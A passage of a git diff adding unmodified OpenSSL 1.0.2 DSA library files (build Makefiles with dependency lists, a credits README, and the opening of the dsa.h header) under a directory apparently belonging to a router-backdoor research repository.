+
+GENERAL=Makefile
+TEST=dsatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dsa_gen.c dsa_key.c dsa_lib.c dsa_asn1.c dsa_vrf.c dsa_sign.c \
+	dsa_err.c dsa_ossl.c dsa_depr.c dsa_ameth.c dsa_pmeth.c dsa_prn.c
+LIBOBJ= dsa_gen.o dsa_key.o dsa_lib.o dsa_asn1.o dsa_vrf.o dsa_sign.o \
+	dsa_err.o dsa_ossl.o dsa_depr.o dsa_ameth.o dsa_pmeth.o dsa_prn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dsa.h
+HEADER=	dsa_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dsa_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dsa_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_ameth.o: ../../include/openssl/opensslconf.h
+dsa_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dsa_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dsa_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+dsa_ameth.o: dsa_ameth.c
+dsa_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dsa_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_asn1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_asn1.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_asn1.o: ../../include/openssl/opensslconf.h
+dsa_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_asn1.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_asn1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_asn1.o: ../cryptlib.h dsa_asn1.c
+dsa_depr.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_depr.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_depr.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_depr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dsa_depr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dsa_depr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dsa_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_depr.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_depr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_depr.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_depr.c
+dsa_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dsa_err.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_err.o: dsa_err.c
+dsa_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_gen.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_gen.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_gen.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dsa_gen.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dsa_gen.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dsa_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_gen.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_gen.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_gen.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_gen.c dsa_locl.h
+dsa_key.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_key.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+dsa_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dsa_key.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_key.c
+dsa_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_lib.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+dsa_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+dsa_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dsa_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_lib.c
+dsa_ossl.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_ossl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_ossl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_ossl.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_ossl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_ossl.o: ../../include/openssl/opensslconf.h
+dsa_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_ossl.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_ossl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_ossl.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_ossl.c
+dsa_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dsa_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dsa_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_pmeth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_pmeth.o: ../../include/openssl/opensslconf.h
+dsa_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dsa_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dsa_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+dsa_pmeth.o: dsa_locl.h dsa_pmeth.c
+dsa_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_prn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+dsa_prn.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_prn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_prn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_prn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_prn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_prn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_prn.o: ../cryptlib.h dsa_prn.c
+dsa_sign.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_sign.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_sign.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_sign.o: ../../include/openssl/opensslconf.h
+dsa_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_sign.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_sign.o: ../cryptlib.h dsa_sign.c
+dsa_vrf.o: ../../e_os.h ../../include/openssl/bio.h
+dsa_vrf.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_vrf.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_vrf.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_vrf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_vrf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_vrf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_vrf.o: ../cryptlib.h dsa_vrf.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.save
new file mode 100644
index 0000000..f5c4e90
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.save
@@ -0,0 +1,199 @@
+#
+# OpenSSL/crypto/dsa/Makefile
+#
+
+DIR=	dsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=dsatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dsa_gen.c dsa_key.c dsa_lib.c dsa_asn1.c dsa_vrf.c dsa_sign.c \
+	dsa_err.c dsa_ossl.c dsa_depr.c dsa_ameth.c dsa_pmeth.c dsa_prn.c
+LIBOBJ= dsa_gen.o dsa_key.o dsa_lib.o dsa_asn1.o dsa_vrf.o dsa_sign.o \
+	dsa_err.o dsa_ossl.o dsa_depr.o dsa_ameth.o dsa_pmeth.o dsa_prn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dsa.h
+HEADER=	dsa_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dsa_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dsa_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_ameth.o: ../../include/openssl/opensslconf.h
+dsa_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dsa_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dsa_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+dsa_ameth.o: dsa_ameth.c
+dsa_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dsa_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_asn1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_asn1.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_asn1.o: ../../include/openssl/opensslconf.h
+dsa_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_asn1.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_asn1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_asn1.o: ../cryptlib.h dsa_asn1.c
+dsa_depr.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_depr.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_depr.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_depr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dsa_depr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dsa_depr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dsa_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_depr.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_depr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_depr.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_depr.c
+dsa_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dsa_err.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_err.o: dsa_err.c
+dsa_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_gen.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_gen.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_gen.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dsa_gen.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dsa_gen.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dsa_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_gen.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_gen.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_gen.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_gen.c dsa_locl.h
+dsa_key.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_key.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+dsa_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dsa_key.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_key.c
+dsa_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_lib.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+dsa_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+dsa_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dsa_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_lib.c
+dsa_ossl.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_ossl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_ossl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_ossl.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_ossl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_ossl.o: ../../include/openssl/opensslconf.h
+dsa_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_ossl.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_ossl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_ossl.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_ossl.c
+dsa_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dsa_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dsa_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_pmeth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_pmeth.o: ../../include/openssl/opensslconf.h
+dsa_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dsa_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dsa_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+dsa_pmeth.o: dsa_locl.h dsa_pmeth.c
+dsa_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_prn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+dsa_prn.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_prn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_prn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_prn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_prn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_prn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_prn.o: ../cryptlib.h dsa_prn.c
+dsa_sign.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_sign.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_sign.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_sign.o: ../../include/openssl/opensslconf.h
+dsa_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_sign.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_sign.o: ../cryptlib.h dsa_sign.c
+dsa_vrf.o: ../../e_os.h ../../include/openssl/bio.h
+dsa_vrf.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_vrf.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_vrf.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_vrf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_vrf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_vrf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_vrf.o: ../cryptlib.h dsa_vrf.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/README
new file mode 100644
index 0000000..6a7e9c1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/README
@@ -0,0 +1,4 @@
+The stuff in here is based on patches supplied to me by
+Steven Schoch <schoch@sheba.arc.nasa.gov> to do DSS.
+I have since modified a them a little but a debt of gratitude
+is due for doing the initial work.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa.h
new file mode 100644
index 0000000..545358f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa.h
@@ -0,0 +1,332 @@
+/* crypto/dsa/dsa.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * The DSS routines are based on patches supplied by
+ * Steven Schoch <schoch@sheba.arc.nasa.gov>.  He basically did the
+ * work and I have just tweaked them a little to fit into my
+ * stylistic vision for SSLeay :-) */
+
+#ifndef HEADER_DSA_H
+# define HEADER_DSA_H
+
+# include <openssl/e_os2.h>
+
+# ifdef OPENSSL_NO_DSA
+#  error DSA is disabled.
+# endif
+
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/crypto.h>
+# include <openssl/ossl_typ.h>
+
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+#  ifndef OPENSSL_NO_DH
+#   include <openssl/dh.h>
+#  endif
+# endif
+
+# ifndef OPENSSL_DSA_MAX_MODULUS_BITS
+#  define OPENSSL_DSA_MAX_MODULUS_BITS   10000
+# endif
+
+# define DSA_FLAG_CACHE_MONT_P   0x01
+/*
+ * new with 0.9.7h; the built-in DSA implementation now uses constant time
+ * modular exponentiation for secret exponents by default. This flag causes
+ * the faster variable sliding window method to be used for all exponents.
+ */
+# define DSA_FLAG_NO_EXP_CONSTTIME       0x02
+
+/*
+ * If this flag is set the DSA method is FIPS compliant and can be used in
+ * FIPS mode. This is set in the validated module method. If an application
+ * sets this flag in its own methods it is its reposibility to ensure the
+ * result is compliant.
+ */
+
+# define DSA_FLAG_FIPS_METHOD                    0x0400
+
+/*
+ * If this flag is set the operations normally disabled in FIPS mode are
+ * permitted it is then the applications responsibility to ensure that the
+ * usage is compliant.
+ */
+
+# define DSA_FLAG_NON_FIPS_ALLOW                 0x0400
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Already defined in ossl_typ.h */
+/* typedef struct dsa_st DSA; */
+/* typedef struct dsa_method DSA_METHOD; */
+
+typedef struct DSA_SIG_st {
+    BIGNUM *r;
+    BIGNUM *s;
+} DSA_SIG;
+
+struct dsa_method {
+    const char *name;
+    DSA_SIG *(*dsa_do_sign) (const unsigned char *dgst, int dlen, DSA *dsa);
+    int (*dsa_sign_setup) (DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp,
